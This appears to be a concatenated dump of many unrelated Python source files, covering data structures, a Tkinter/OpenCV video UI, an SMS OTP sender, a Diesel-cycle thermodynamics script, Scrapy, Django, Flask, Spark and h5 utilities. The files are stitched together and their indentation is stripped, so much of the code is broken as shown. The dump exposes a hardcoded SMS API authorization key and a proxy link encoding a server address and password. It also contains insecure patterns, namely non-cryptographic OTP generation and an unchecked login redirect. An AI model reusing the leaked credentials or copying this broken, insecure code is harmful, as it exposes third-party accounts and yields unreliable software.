test = "ssr://MTc2LjEyMi4xMzIuMTIwOjIzMzM6YXV0aF9hZXMxMjhfbWQ1OmFlcy0xMjgtY3RyOnRsczEuMl90aWNrZXRfYXV0aDpjR0Z6YzNkdmNtUXgvP29iZnNwYXJhbT0mcHJvdG9wYXJhbT0mcmVtYXJrcz0mZ3JvdXA9JnVkcHBvcnQ9MCZ1b3Q9MA"
print(getConfig(test))
|
24,112 | 24294685e38b0c42048010a0be113ca7e145fa6d | from StudiObject import StudiObject
from TreeNode import TreeNode
class BinarySearchTree:
def __init__(self, key=lambda x: x):
self.root = None
self.key = key
def __iter__(self):
yield from self.inorder()
def _find_parent(self, child_node):
current_parent = self.root
# special case child_node is root:
if id(current_parent) == id(child_node):
raise Exception("root-node has no parent!")
while current_parent is not None:
# if it is parent, return it
if current_parent.left is child_node or current_parent.right is child_node:
return current_parent
# this isn't the parent, try next one
if self.key(child_node.key) <= self.key(current_parent.key):
current_parent = current_parent.left
else:
current_parent = current_parent.right
raise Exception("no parent found!")
def search(self, my_key_data, key=None):
ret = []
current: TreeNode = self.root
if key is None or key is self.key:
while current is not None:
if my_key_data == self.key(current.key):
ret.append(current)
if my_key_data <= self.key(current.key):
current = current.left
else:
current = current.right
else: # we need to use a different key-func, so our nicely sorted BST is irrelevant and we need to find it by iterating over everything ;(
for current in self._node_inorder(self.root):
if my_key_data == key(current.key):
ret.append(current)
return ret # returns [] if nothing found
def _insert(self, root: TreeNode, new_node: TreeNode):
if self.key(new_node.key) <= self.key(root.key):
# muss links von root eingefügt werden
if root.left is None:
root.left = new_node
else:
self._insert(root.left, new_node)
else:
# muss rechts von root eingefügt werden
if root.right is None:
root.right = new_node
else:
self._insert(root.right, new_node)
def insert(self, val):
new_node = TreeNode(val)
# special case root is empty:
if self.root is None:
self.root = new_node
return
# normal case:
self._insert(self.root, new_node)
return new_node
@staticmethod
def _inorder(root):
if root:
yield from BinarySearchTree._inorder(root.left)
yield root.key
yield from BinarySearchTree._inorder(root.right)
@staticmethod
def _node_inorder(root):
if root:
yield from BinarySearchTree._node_inorder(root.left)
yield root
yield from BinarySearchTree._node_inorder(root.right)
def inorder(self):
return BinarySearchTree._inorder(self.root)
def delete(self, what, key=None): # deletes all found, returns list of deleted nodes
ret = self.search(what, key)
for node in ret:
self.delete_node(node)
#return ret
def _get_inorder_successor(self, node: TreeNode):
try:
my_generator = self._node_inorder(node.right)
successor = next(my_generator) # if this fails it means it didn't have 2 children
return successor
except:
raise Exception("no successor found!")
def delete_node(self, del_node: TreeNode):
if del_node is None:
return print("Can't delete a non-existing Node!")
# Node is a leaf
elif del_node.left is None and del_node.right is None:
parent = self._find_parent(del_node)
if self.key(del_node.key) <= self.key(parent.key):
parent.left = None
else:
parent.right = None
# Node has a left child
elif del_node.left is not None and del_node.right is None:
if del_node is self.root:
self.root = del_node.left
else:
parent = self._find_parent(del_node)
if parent.right is del_node:
parent.right = del_node.left
elif parent.left is del_node:
parent.left = del_node.left
else:
raise Exception("ok, we just destroyed causality!?")
# Node has a right child
elif del_node.left is None and del_node.right is not None:
if del_node is self.root:
self.root = del_node.right
else:
parent = self._find_parent(del_node)
if parent.right is del_node:
parent.right = del_node.right
elif parent.left is del_node:
parent.left = del_node.right
else:
raise Exception("ok, we just destroyed causality!?")
# Node has 2 children
else:
# 1. find minimum from right subtree
my_generator = self._node_inorder(del_node.right)
minimum_node = next(my_generator) # if this fails it means it didn't have 2 children
# 2. replace value of del_node with this minimum-value
tmp = minimum_node.key
# 3. call delete for minimum-node
self.delete_node(minimum_node)
del_node.key = tmp
def change_value(self, modified_node):
val = modified_node.key
self.delete_node(modified_node)
self.insert(val)
if __name__ == "__main__":
bst = BinarySearchTree()
# bst.insert(StudiObject("B", 2))
# bst.insert(StudiObject("A", 1))
# bst.insert(StudiObject("C", 99999))
# bst.insert(StudiObject("D", 10))
# bst.insert(StudiObject("E", 223))
a = bst.insert(100)
bst.insert(99)
bst.insert(98)
print("Traversal:")
for k in bst:
print(k)
s = bst.search(99)
print("search for 99: %s" % s)
print("Delete searched node:")
bst.delete_node(s[0])
print("Traversal:")
for k in bst:
print(k)
|
24,113 | 4e9a57abb61e5900aade55e8ffeb968a51727283 | #video_name = r"C:\Users\PANKAJ\Desktop\DBMS\virtual_museum\vit.mp4" #This is your video file path
import os
from tkinter import *
app = Tk()
app.title('Video Player')
Fcanvas = Canvas(bg="black", height=600, width=170)
def snd1():
os.system(r"C:\Users\PANKAJ\Desktop\DBMS\virtual_museum\vit.mp4")
var = IntVar()
rb1 = Radiobutton(app, text= "Play Video", variable = var, value=1, command=snd1)
rb1.pack(anchor = W)
Fcanvas.pack()
app.mainloop()
|
24,114 | b01f48da1ae2ed0f1b3bbe3203e9037b4149ac72 | import requests
# import library
import math, random
import datetime
from datetime import timedelta
def send_sms(mobile, code):
url = 'https://www.fast2sms.com/dev/bulk'
payload = {
'sender_id': 'IMATKA',
'message': 'iMatka Verification Code %s' % (code, ),
'language': 'english',
'route': 'p',
'numbers': mobile,
# 'flash': '1'
}
headers = {'authorization': 'ZJcnFtUN6SzAlDrdR1WkP7GgyOi8hwqb9spT20x5XYQICaumjLLbqn47VhJ3tMx0ICZdoNUgPkziwElX'}
try:
r = requests.post(url, data=payload, headers=headers)
print(r.json())
except Exception as e:
print(str(e))
# function to generate OTP
def generateOTP():
# Declare a digits variable
# which stores all digits
digits = "0123456789"
OTP = ""
# length of password can be chaged
# by changing value in range
for i in range(6):
OTP += digits[math.floor(random.random() * 10)]
return OTP
def get_today_range(is_past_date=False, is_tomorrow_date=False):
today_min = datetime.datetime.combine(datetime.date.today(), datetime.time.min)
if is_past_date:
today_min = datetime.datetime.combine(datetime.date.today() - timedelta(days=1), datetime.time.min)
today_max = datetime.datetime.combine(datetime.date.today(), datetime.time.max)
if is_tomorrow_date:
today_max = datetime.datetime.combine(datetime.date.today() + timedelta(hours=7), datetime.time.max)
return [today_min, today_max]
|
24,115 | 39b5cb3a40670d90ae7476208d76d74ff04e7167 | # coding: utf8
# Sauf mention explicite du contraire par la suite, ce travail a été fait par
# Jean-Julien Fleck, professeur de physique/IPT en PCSI1 au lycée Kléber.
# Vous êtes libres de le réutiliser et de le modifier selon vos besoins.
"""
Le but de ce script est la résolution d'un exercice concernant un cycle Diesel
à double combustion (cf fichier py4phys.pdf pour le détail de l'exercice)
"""
import numpy as np # Les outils mathématiques
import CoolProp.CoolProp as CP # Les outils thermodynamiques
import matplotlib.pyplot as plt # Les outils graphiques
P,T,s,v = {},{},{},{}
# Les données de l'énoncé
R = 8.314 # Constante des gaz parfaits
gaz = 'Air' # Type de gaz
T[1]= 293
P[1]= 1e5
P[3]= 65e5
P[4]= P[3]
T[4]= 2173
a = 19
# Calcul du coefficient de Laplace (en le supposant inchangé sur tout le cycle)
cP = CP.PropsSI('C','T',T[1],'P',P[1],gaz)
cV = CP.PropsSI('O','T',T[1],'P',P[1],gaz)
gamma = cP/cV
# et de la masse molaire (NB: pour eux le "SI" de M, c'est le kg/kmol...)
M = CP.PropsSI(gaz,'molemass')*1e-3
# Un peu de feedback pour l'utilisateur:
print('Gaz choisi:',gaz)
print('Masse molaire:',M,'kg/mol')
print('gamma:',gamma)
# Fonction dichotomique utile
def find_P_from_v_s(v,s,Pstart,Pstop,eps=1e-6):
""" Retrouver P par dichotomie à partir du volume massique et de
l'entropie massique. """
v1 = 1/CP.PropsSI('D','P',Pstart,'S',s,gaz)
v2 = 1/CP.PropsSI('D','P',Pstop,'S',s,gaz)
while abs(v2-v1)/v > eps:
Pm = (Pstart+Pstop)/2.0
vm = 1/CP.PropsSI('D','P',Pm,'S',s,gaz)
if (vm-v)*(v2-v) < 0: Pstart,v1 = Pm,vm
else: Pstop,v2 = Pm,vm
return Pm
# Calculs des points intermédiaires
v[1]= 1/CP.PropsSI('D','P',P[1],'T',T[1],gaz) # Inverse de densité
v[2]= v[1]/a # Facteur de compression
s[1]= CP.PropsSI('S','T',T[1],'P',P[1],gaz) # Entropie correspondante
s[2]= s[1] # Isentropique
P[2]= find_P_from_v_s(v[2],s[2],P[1],P[3]) # Récupération pression (faut ruser)
T[2]= CP.PropsSI('T','P',P[2],'S',s[2],gaz) # Température correspondante
v[3]= v[2] # Isochore
T[3]= CP.PropsSI('T','P',P[3],'D',1/v[3],gaz) # dont on connaît la pression finale
v[4]= 1/CP.PropsSI('D','P',P[4],'T',T[4],gaz) # Isobare à T connue
s[4]= CP.PropsSI('S','P',P[4],'T',T[4],gaz) # et calcul de l'entropie correspondante
s[5]= s[4] # Isentropique
v[5]= v[1] # Dernière isochore
P[5]= find_P_from_v_s(v[5],s[5],P[1],P[3]) # Ruse sioux pour la pression
T[5]= CP.PropsSI('T','P',P[5],'D',1/v[5],gaz) # et obtention de la T correspondante
# On échantillonne à présent les pressions sur les différents chemins...
nb_points = 100
P12 = np.linspace(P[1],P[2],nb_points)
P23 = np.array([P[2],P[3]])
P34 = np.array([P[3],P[4]])
P45 = np.linspace(P[4],P[5],nb_points)
P51 = np.array([P[5],P[1]])
# ...pour calculer les volumes massiques correspondants (comme d'habitude,
# CoolProp fournit la masse volumique (densité "D") et non le volume massique
# donc il faut passer à l'inverse).
v12 = 1/CP.PropsSI('D','P',P12,'S',s[1],gaz) # Compression isentropique
v23 = [v[2],v[3]] # Compression isochore
v34 = [v[3],v[4]] # Détente isobare
v45 = 1/CP.PropsSI('D','P',P45,'S',s[4],gaz) # Détente isentropique
v51 = [v[5],v[1]] # Détente isochore
def infos_point(nb,P,T,v):
print('Infos pour le point {0}: T={1} K, v={3} m^3/kg, P={2} bar'.format(nb,round(T,1),round(P/1e5,1),round(v,4)))
def travail(L_P,L_v):
W = 0
for (P,v) in zip(L_P,L_v):
W -= np.trapz(P,v)
return W
def calcule_Delta(f,i,j):
""" Calcule la variation de la fonction d'état f (à choisir entre 'U',
'H', 'S' ou 'G') entre les points i et j à partir des valeurs (supposées
connues) de température et de pression. """
fi = CP.PropsSI(f,'P',P[i],'T',T[i],gaz)
fj = CP.PropsSI(f,'P',P[j],'T',T[j],gaz)
return fj-fi
# On donne du feedback:
print('Cas réel:')
for i in range(1,6):
infos_point(i,P[i],T[i],v[i])
L_P = [P12,P23,P34,P45,P51]
L_v = [v12,v23,v34,v45,v51]
W = travail(L_P,L_v) # Calcul du travail sur tout le cycle
print('Travail total sur le cycle:',round(W/1e3,2),'kJ/kg')
Q23 = calcule_Delta('U',2,3) # Q pour une isochore
Q34 = calcule_Delta('H',3,4) # Q pour une isobare
print('Transfert thermique reçu sur 2->3:',round(Q23/1e3,2),'kJ/kg')
print('Transfert thermique reçu sur 3->4:',round(Q34/1e3,2),'kJ/kg')
# Calcul du rendement
print('Rendement total: r=',-W/(Q23+Q34))
# Reste à représenter le tout
for i in range(len(L_v)):
plt.plot(L_v[i],L_P[i]/1e5,label='{}$\\to${}, reel'.format(i+1,(i+1)%5+1))
# Maintenant, faisons quelques calculs théoriques.
# D'abord les volumes massiques des deux premiers points:
v[1] = R*T[1]/(M*P[1])
v[2] = v[1]/a
# Pressions et Température en 2 s'obtiennent via la loi de Laplace
P[2] = P[1] * (v[1]/v[2])**gamma
T[2] = T[1] * (v[1]/v[2])**(gamma-1)
# Ensuite, on fait une isochore dont on connaît la pression d'arrivée
v[3] = v[2]
T[3] = M*P[3]*v[3]/R
# Après, c'est au tour de l'isobare dont on connait la température finale
v[4] = R*T[4]/(M*P[4])
# Finalement, on refait une isentropique jusqu'à atteindre v[1]
v[5] = v[1]
P[5] = P[4] * (v[4]/v[5])**gamma
T[5] = T[4] * (v[4]/v[5])**(gamma-1)
# On échantillonne à présent les pressions sur les différents chemins...
nb_points = 100
P12 = np.linspace(P[1],P[2],nb_points)
P23 = np.array([P[2],P[3]])
P34 = np.array([P[3],P[4]])
P45 = np.linspace(P[4],P[5],nb_points)
P51 = np.array([P[5],P[1]])
# ...pour calculer les volumes massiques correspondants
v12 = v[1]*(P[1]/P12)**(1/gamma) # Compression isentropique
v23 = [v[2],v[3]] # Compression isochore
v34 = [v[3],v[4]] # Détente isobare
v45 = v[4]*(P[4]/P45)**(1/gamma) # Détente isentropique
v51 = [v[5],v[1]] # Détente isochore
# On donne du feedback:
print('Cas Gaz parfait:')
for i in range(1,6):
infos_point(i,P[i],T[i],v[i])
L_P = [P12,P23,P34,P45,P51]
L_v = [v12,v23,v34,v45,v51]
W = travail(L_P,L_v) # Calcul du travail total
print('Travail total sur le cycle:',round(W/1e3,2),'kJ/kg')
Q23 = cV*(T[3]-T[2]) # Q sur une isochore
Q34 = cP*(T[4]-T[3]) # Q sur une isobare
print('Transfert thermique reçu sur 2->3:',round(Q23/1e3,2),'kJ/kg')
print('Transfert thermique reçu sur 3->4:',round(Q34/1e3,2),'kJ/kg')
print('Rendement total: r=',-W/(Q23+Q34))
# Reste à représenter le tout
for i in range(len(L_v)):
plt.plot(L_v[i],L_P[i]/1e5,label='{}$\\to${}, GP'.format(i+1,(i+1)%5+1))
plt.legend()
plt.xlabel('$v$ en m$^3/$kg')
plt.ylabel('P en bar')
plt.title("""Cycle Diesel double combustion
Comparaison du gaz reel et du gaz parfait""")
plt.savefig('PNG/T6_resolution_cycle_diesel.png')
|
24,116 | c80acb63f548726ec006372ea82566a89c88cfcf | #!/usr/bin/env python3
import os
from aws_cdk import core
from python_lambda_simple.python_lambda_simple_stack import PythonLambdaSimpleStack
app = core.App()
# for production set your Environment to specify the target region and account
# Prod_Env__Ire = env=core.Environment(region="eu-west-1",account="<YOUR_ACCOUNT-ID>")
PythonLambdaSimpleStack(app, "python-lambda-simple", env=core.Environment(
account=os.environ["CDK_DEFAULT_ACCOUNT"],
region=os.environ["CDK_DEFAULT_REGION"]))
app.synth()
|
24,117 | c49e5bf87964411ab50e4830498d6b411cd823d6 | from game import Game
import pygame as pg
class Board:
def __init__(self):
self.needs_redraw = False
self.discard = False
self.highlight_card_index = -1
def request_redraw(self):
self.needs_redraw = True
def is_hand_card_highlighted(self, card_index):
return self.highlight_card_index == card_index
def update_hand_card_highlight(self, card_index):
if self.highlight_card_index != card_index:
self.highlight_card_index = card_index
self.needs_redraw = True
class GameController:
def __init__(self, game, board):
self.game = game
self.board = board
def on_hand_card_mouse_over(self, hand_card_index):
self.board.update_hand_card_highlight(hand_card_index)
def on_hand_card_mouse_down(self, hand_card_index):
if self.board.discard:
self.discard_card(hand_card_index)
else:
self.select_card(hand_card_index)
return
def discard_card(self, selected_card_number):
hand = self.game.current_player_hand()
print("discarrrrrrrrrrrrrrrrd")
del hand[selected_card_number]
self.game.current_player_index.give_moneys_for_discard()
print("MONEY: ", player.money)
self.game.current_player_finished()
self.board.request_redraw()
def select_card(self, selected_card_number):
hand = self.game.current_player_hand()
print("selecting a card!!!")
selected_card = hand[selected_card_number]
if self.game.current_player().play_card(selected_card):
del hand[selected_card_number]
self.game.current_player_finished()
self.board.request_redraw()
|
24,118 | 2ed8bed741b279dffad83ff3561bb9a54eb431cf | from pyspark import SparkContext, SparkConf
from pyspark.streaming import StreamingContext
from pyspark.streaming.kafka import KafkaUtils
import json
import sys
import os
os.environ['PYSPARK_SUBMIT_ARGS'] = ' --packages org.apache.spark:spark-streaming-kafka-0-8_2.11:2.4.4 pyspark-shell'
sc = SparkContext(appName='Spark Streaming')
ssc = StreamingContext(sc, 1)
sc.setLogLevel("WARN")
directKafkaStream = KafkaUtils.createDirectStream(ssc, ["twitter"], {"metadata.broker.list": "localhost:9092", "zookeeper.connection.timeout.ms": "10000"})
directKafkaStream.pprint()
ssc.start()
ssc.awaitTermination() |
24,119 | 3c5fc9ae60edf23a37e366bceff0c050a7360351 | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
import simplejson
import urllib
import googlemaps
import keys
class FlatvisualizerPipeline(object):
def process_item(self, item, spider):
return item
class AddDistanceToWorkPipeLine(object):
latitude_longitude_work = str((52.45402, 13.29320))
def __init__(self):
self.key = keys.GOOGLE_MAPS_API_KEY
self.gm_client = googlemaps.Client(self.key)
def process_item(self, item, spider):
origin = item["address"]
geo_location = self.gm_client.geocode(origin)
if len(geo_location) > 0:
for k in ('lat', 'lng'):
item[k] = geo_location[0]['geometry']["location"][k]
directions_result = self.gm_client.directions(str((item['lat'], item['lng'])),
self.latitude_longitude_work,
mode = "transit",
departure_time = 1421307820)
chosen_leg = None
if len(directions_result) > 0:
for dr in directions_result:
for l in dr['legs']:
if chosen_leg is None:
chosen_leg = l
if chosen_leg is not None and chosen_leg["duration"]["value"] > l["duration"]["value"]:
chosen_leg = l
if chosen_leg is None:
return
item["time_to_work"] = chosen_leg["duration"]["value"]/60.0
return item |
24,120 | c1c95a93091e0892ab204165416f2cf707ff21c2 | from django.urls import path
from . import views
app_name='tracker'
urlpatterns = [
path('', views.index, name='index'),
path('addBook/', views.addBook, name='addBook'),
path('deleteBook/<int:pk>/', views.deleteBook, name='deleteBook'),
path('moveBook/<int:pk>/', views.moveBook, name='moveBook'),
path('profile/', views.displayProfile, name='displayProfile'),
path('deleteAccount/', views.deleteAccount, name='deleteAccount'),
path('books/', views.showBooks, name='showBooks')
] |
24,121 | 6d87ba55efc5e3b4be679cf47cc2561dc482b5b5 | # coding=utf-8
from flask import flash, make_response, render_template, request, redirect, url_for
from flask_login import login_user, logout_user
from blog.app import app, login_manager
from blog.form import LoginForm
@app.route('/')
def homepage():
name = request.args.get('name')
number = request.args.get('number')
return render_template('homepage.html', name=name, number=number)
@app.route('/login/', methods=['GET', 'POST'])
def login():
form = LoginForm()
if request.method == 'POST' and form.validate_on_submit():
login_user(form.user, remember=form.remember_me.data)
flash('Successfully login in as {}'.format(form.email.data), 'success')
return redirect(request.args.get('next') or url_for('homepage'))
return render_template('login.html', form=form)
@app.route('/logout/', methods=['GET', 'POST'])
def logout():
logout_user()
flash('You have been logged out.', 'success')
return redirect(request.args.get('next') or url_for('homepage'))
@app.errorhandler(404)
def page_not_found(e):
return render_template('404.html'), 404
@app.errorhandler(500)
def internal_server_error(e):
return render_template('500.html'), 500 |
24,122 | 6a9c69a0da1f311378439784d5f8a4c8742a3f38 | import collections
N = int(input())
S = [input() for i in range(N)]
M = int(input())
T = [input() for i in range(M)]
maxi = 0
for i in range(len(S)):
if S.count(S[i]) - T.count(S[i]) > maxi:
maxi = S.count(S[i]) - T.count(S[i])
print(maxi) |
24,123 | fd6eda51efee7bf056a18697f067b454916051ac | import pickle
import pandas as pd
import numpy as np
import gensim
# test_data = pd.read_csv('../test_preprocessed.csv', index_col=0)
# # test_data = test_data.head(100)
# model = gensim.models.doc2vec.Doc2Vec.load('../enwiki_dbow/doc2vec.bin')
#
# print('Extracting testing doc2vec features...')
#
# features_test = []
#
# for index, row in test_data.iterrows():
# q1 = row[0]
# q2 = row[1]
# if pd.notnull(q1) and pd.notnull(q2):
# q1 = q1.split(' ')
# q2 = q2.split(' ')
# elif not pd.notnull(q1):
# q1 = [' ']
# elif not pd.notnull(q2):
# q2 = [' ']
# q1_vec = model.infer_vector(q1)
# q2_vec = model.infer_vector(q2)
# feature = np.concatenate((q1_vec, q2_vec), axis=0)
# features_test.append(feature)
#
# print('Saving data...')
# np.save('features_test_doc2vec.npy', features_test)
#
# print('Trying to load data from file...')
# check = np.load('features_test_doc2vec.npy')
# print(check[:2])
test_data = pd.read_csv('../test_preprocessed.csv', index_col=0)
text = ''
with open('PETA_otazky.txt', 'w', encoding='utf-8') as file:
file.write(text)
for index, row in test_data.iterrows():
q1 = row[0]
q2 = row[1]
if pd.notnull(q1):
text += q1 + '\n'
if pd.notnull(q2):
text += q2 + '\n'
with open('PETA_otazky.txt', 'w', encoding='utf-8') as file:
file.write(text) |
24,124 | 6d0703029d777f1561dc489cfe0ced2fb39187e0 | # from progressbar import ProgressBar, Percentage, Bar, ETA
import os
import sys
import h5py
import numpy as np
from PIL import Image
from boml.load_data.datasets.load_full_dataset import MINI_IMAGENET_FOLDER_RES84
def img_to_array_old(image_file, resize=84, flip=False, convert_to_gray=False):
img_z = Image.open(image_file)
# img_z.convert('RGB') # not useful at all...
if resize:
img_z = img_z.resize((resize, resize), Image.LANCZOS)
if (
flip
): # when reading a stack saved in vaa3d format Y coordinates are reversed (used by save_subst
img_z = img_z.transpose(Image.FLIP_TOP_BOTTOM)
if convert_to_gray:
img_z = img_z.convert("L")
ary = np.array(img_z)
ary = (
np.stack((ary,) * 3, axis=2) if ary.ndim == 2 else ary
) # some images are black and white
return (
ary if ary.shape[-1] == 3 else ary[:, :, :3]
) # some images have an alpha channel... (unbelievable...)
def img_to_array(imfile, resize=84):
from scipy.misc import imresize, imread
img = imread(imfile, mode="RGB")
if resize:
# noinspection PyTypeChecker
img = imresize(img, size=(resize, resize, 3))
return img
def images_to_tensor(files, tensor):
# widgets = [Percentage(), ' ', Bar(), ' ', ETA()]
# pbar = ProgressBar(widgets=widgets, maxval=len(files))
# pbar.start()
for i, f in enumerate(files):
print(f)
tensor[i, :] = img_to_array(f)
# pbar.update(i + 1)
# pbar.finish()
def tensor_to_images(prefix, tensor):
n = tensor.shape[0]
# widgets = [Percentage(), ' ', Bar(), ' ', ETA()]
# pbar = ProgressBar(widgets=widgets, maxval=n)
# pbar.start()
for z in range(n):
img = Image.fromarray(tensor[z].astype(np.int8), mode="L")
img.save(prefix + "%03d" % z + ".tif")
# pbar.update(z + 1)
# pbar.finish()
def convert_mini_imagenet(_folder=None, resize=None):
for st in ["train", "val", "test"]:
folder = os.path.join(_folder or MINI_IMAGENET_FOLDER_RES84, st)
classes = os.listdir(folder)
files = []
for c in classes:
files += [
os.path.join(folder, os.path.join(c, f))
for f in os.listdir(os.path.join(folder, c))
]
# print(files)
n = len(files)
img_shape = img_to_array(files[0], resize=resize).shape
img = img_to_array(files[0], resize=resize)
print(img)
print(img.dtype)
h5file = h5py.File(
os.path.join(_folder or MINI_IMAGENET_FOLDER_RES84, "%s.h5" % st), "w"
)
X = h5file.create_dataset(
"X", (n, img_shape[0], img_shape[1], img_shape[2]), dtype=np.uint8
)
images_to_tensor(files, X)
if __name__ == "__main__":
convert_mini_imagenet(sys.argv[1] if len(sys.argv) > 1 else None, resize=None)
# base = '../vasculature_data'
# orig_files = ['{}/orig/097000_164000_08600000{:0>2d}.tif'.format(base, z) for z in range(100)]
# target_files = ['{}/GT/097000_164000_086000-labels-stack-intero-smooth00{:0>2d}.tif'.format(base, z) for z in range(100)]
#
# assert(len(orig_files) == len(target_files))
# n = len(orig_files)
# img_shape = img_to_array(orig_files[0]).shape
#
# h5file = h5py.File('vasculature.h5', 'w')
# X = h5file.create_dataset("X", (n,img_shape[0],img_shape[1]), h5py.h5t.NATIVE_FLOAT)
# y = h5file.create_dataset("y", (n,img_shape[0],img_shape[1]), h5py.h5t.NATIVE_FLOAT)
# images_to_tensor(orig_files, X, 65535.)
# images_to_tensor(target_files, y, 255.)
# h5file.close()
#
# base = '../vasculature_data'
# orig_files = ['{}/orig/097000_164000_08600000{:0>2d}.tif'.format(base, z) for z in range(100)]
# target_files = ['{}/GT/097000_164000_086000-labels-stack-intero-smooth00{:0>2d}.tif'.format(base, z) for z in
# range(100)]
|
24,125 | db89612c8f46583d7fab71ebc68f4fb93548ee60 | '''
Created on 09-May-2013
@author: Devangini
'''
import sys
from optparse import OptionParser
import expressionreco.FaceTracker
import cv2
import cv2.cv as cv
from expressionreco import FaceTracker
import Tkinter as tk
from PIL import Image, ImageTk
from ttk import Style
from Tkconstants import BOTH
from config.CameraConstants import _CameraConstants
DATADIR = "E:\\python workspace\\CharlieCode\\data\\"
HCDIR = "E:\\Softwares\\opencv\\data\\haarcascades\\"
DATADIR2 = "E:\\Softwares\\opencv\\data\\extracascades\\"
class VideoCall:
def openCallWindow(self, topWindow):
print "open call window"
self.topWindow = topWindow
self.frame = tk.Frame(topWindow)
self.topWindow.title("Charlie : UI")
self.style = Style()
self.style.theme_use("default")
self.pack(fill=BOTH, expand=1)
self.frame.grid()
cameraIndex = 0
cameraIndex2 = 2
# RecordAndPlay.recordAndPlay()
self.startVideo(cameraIndex, cameraIndex2)
self.callFaceTracker(cameraIndex2)
def update_video(self):
(self.readsuccessful, self.f) = self.cam.read()
self.gray_im = cv2.cvtColor(self.f, cv2.COLOR_RGB2BGRA)
# self.gray_im = cv2.cvtColor(self.f, cv2.COLOR_RGB2GRAY)
self.a = Image.fromarray(self.gray_im)
self.b = ImageTk.PhotoImage(image=self.a)
self.canvas.create_image(0, 0, image=self.b, anchor=tk.NW)
self.topWindow.update()
# call facetracker
# (readsuccessful, f) = self.cam2.read()
# imageArray = f
# imageFrame = cv.CreateImageHeader((imageArray.shape[1], imageArray.shape[0]), cv.IPL_DEPTH_8U, 3)
# cv.SetData(imageFrame, imageArray.tostring(),
# imageArray.dtype.itemsize * 3 * imageArray.shape[1])
# self.tracker.detect_and_draw(imageFrame, self.cascade, self.cascade2, self.cascade3)
self.topWindow.after(1, self.update_video)
def trial(self):
self.topWindow = tk.Tk()
cameraIndex = 0
cameraIndex2 = 2
self.startVideo(cameraIndex, cameraIndex2)
# self.callFaceTracker(cameraIndex2)
def startVideo(self, cameraIndex, cameraIndex2):
masterPane = tk.Frame(self.topWindow)
masterPane.pack()
videoframe = tk.LabelFrame(masterPane, text='Captured video')
videoframe.grid(column=0, row=0, columnspan=1, rowspan=1, padx=5, pady=5, ipadx=5, ipady=5)
self.cam = cv2.VideoCapture(cameraIndex) # 2)
CameraConstants = _CameraConstants()
self.cam.set(cv.CV_CAP_PROP_FRAME_WIDTH, CameraConstants.cameraWidth())
self.cam.set(cv.CV_CAP_PROP_FRAME_HEIGHT, CameraConstants.cameraHeight())
# cv.SetCaptureProperty(self.cam, cv.CV_CAP_PROP_FRAME_WIDTH, width)
# cv.SetCaptureProperty(self.cam, cv.CV_CAP_PROP_FRAME_HEIGHT, height)
self.canvas = tk.Canvas(videoframe, width=(CameraConstants.cameraWidth()), height=(CameraConstants.cameraHeight()))
self.canvas.grid(column=0, row=0)
# self.cam2 = cv2.VideoCapture(cameraIndex2)
self.topWindow.after(0, self.update_video)
labelName = tk.Label(masterPane, text="Hello, world!")
labelName.grid(column=0, row=3)
path = 'E:\python workspace\CharlieCode\emoticon_smile.png'
# image = Image.open(path)
img = ImageTk.PhotoImage(Image.open(path))
# panel = tk.Label(root, image = img)
# panel.pack(side = "bottom", fill = "both", expand = "yes")
smileButton = tk.Button(masterPane, text="Smile")
smileButton.grid(row=1, column=1)
sadButton = tk.Button(masterPane, text="Frown")
sadButton.grid(row=4, column=1)
surpriseButton = tk.Button(masterPane, text="Surprise")
surpriseButton.grid(row=2, column=1)
neutralButton = tk.Button(masterPane, text="Neutral")
neutralButton.grid(row=3, column=1)
# photo = ImageTk.PhotoImage(image)
# smileButton = tk.Button(self.topWindow, image=photo, \
# command=self.smileCharlie)
#
# smileButton.grid(row=0, column=4)
# label = tk.Label(self.topWindow, image=photo)
# label.image = photo # keep a reference!
# label.grid(row = 4, column = 1)
# label.pack()
self.topWindow.mainloop()
del self.cam
def callFaceTracker(self, cameraIndex2):
arguments = (str(cameraIndex2))
sys.argv = ["FaceTracker.py"] + list(arguments)
# sys.argv = ["testing mainf"] + list(m_args)
parser = OptionParser(usage="usage: %prog [options] [filename|camera_index]")
parser.add_option("-c", "--cascade", action="store", dest="cascade", type="str", help="Haar cascade file, default %default", default=HCDIR + "haarcascade_frontalface_alt_tree.xml")
# parser.add_option("-c", "--cascade", action="store", dest="cascade", type="str", help="Haar cascade file, default %default", default = "../data/haarcascades/haarcascade_frontalface_alt.xml")
(options, args) = parser.parse_args()
self.cascade = cv.Load(options.cascade)
# detect eyes
self.cascade2 = cv.Load(DATADIR2 + "haarcascade eye.xml")
# cascade2 = cv.Load(HCDIR + "..\\eyes\\eye.xml")
# cascade3 = cv.Load(HCDIR + "haarcascade_mcs_mouth.xml")
self.cascade3 = cv.Load(DATADIR2 + "Mouth.xml")
if len(args) != 1:
parser.print_help()
sys.exit(1)
# input_name = args[0]
# if input_name.isdigit():
# capture = cv.CreateCameraCapture(int(input_name))
# else:
# capture = None
# cv.NamedWindow("result", 1)
frame_copy = self.cam2.read() # self.cam.read()
imageArray = frame_copy[1]
imageFrame = cv.CreateImageHeader((imageArray.shape[1], imageArray.shape[0]), cv.IPL_DEPTH_8U, 3)
cv.SetData(imageFrame, imageArray.tostring(),
imageArray.dtype.itemsize * 3 * imageArray.shape[1])
# imageArray = np.zeros(())
self.tracker = FaceTracker.FaceTracker()
# print frame_copy.shape
self.tracker.detect_and_draw(imageFrame, self.cascade, self.cascade2, self.cascade3)
# cv2.cv.iplimage
# if capture:
# frame_copy = None
# while True:
# frame = cv.QueryFrame(capture)
# if not frame:
# cv.WaitKey(0)
# break
# if not frame_copy:
# frame_copy = cv.CreateImage((frame.width,frame.height),
# cv.IPL_DEPTH_8U, frame.nChannels)
# if frame.origin == cv.IPL_ORIGIN_TL:
# cv.Copy(frame, frame_copy)
# else:
# cv.Flip(frame, frame_copy, 0)
#
# FaceTracker.detect_and_draw(frame_copy, cascade, cascade2, cascade3)
#
# if cv.WaitKey(10) >= 0:
# break
# else:
# image = cv.LoadImage(input_name, 1)
# FaceTracker.detect_and_draw(image, cascade)
# cv.WaitKey(0)
# cv.DestroyWindow("result")
def smileCharlie(self):
print "charlie smiling!!!"
if __name__ == '__main__':
call = VideoCall()
call.trial()
# call.callFaceTracker()
|
24,126 | 5e8713294b4952a7402d11ea673ea2682685d8d4 | ###############################################################################
# #
# Copyright (C) 2007-2014 Edward d'Auvergne #
# #
# This file is part of the program relax (http://www.nmr-relax.com). #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
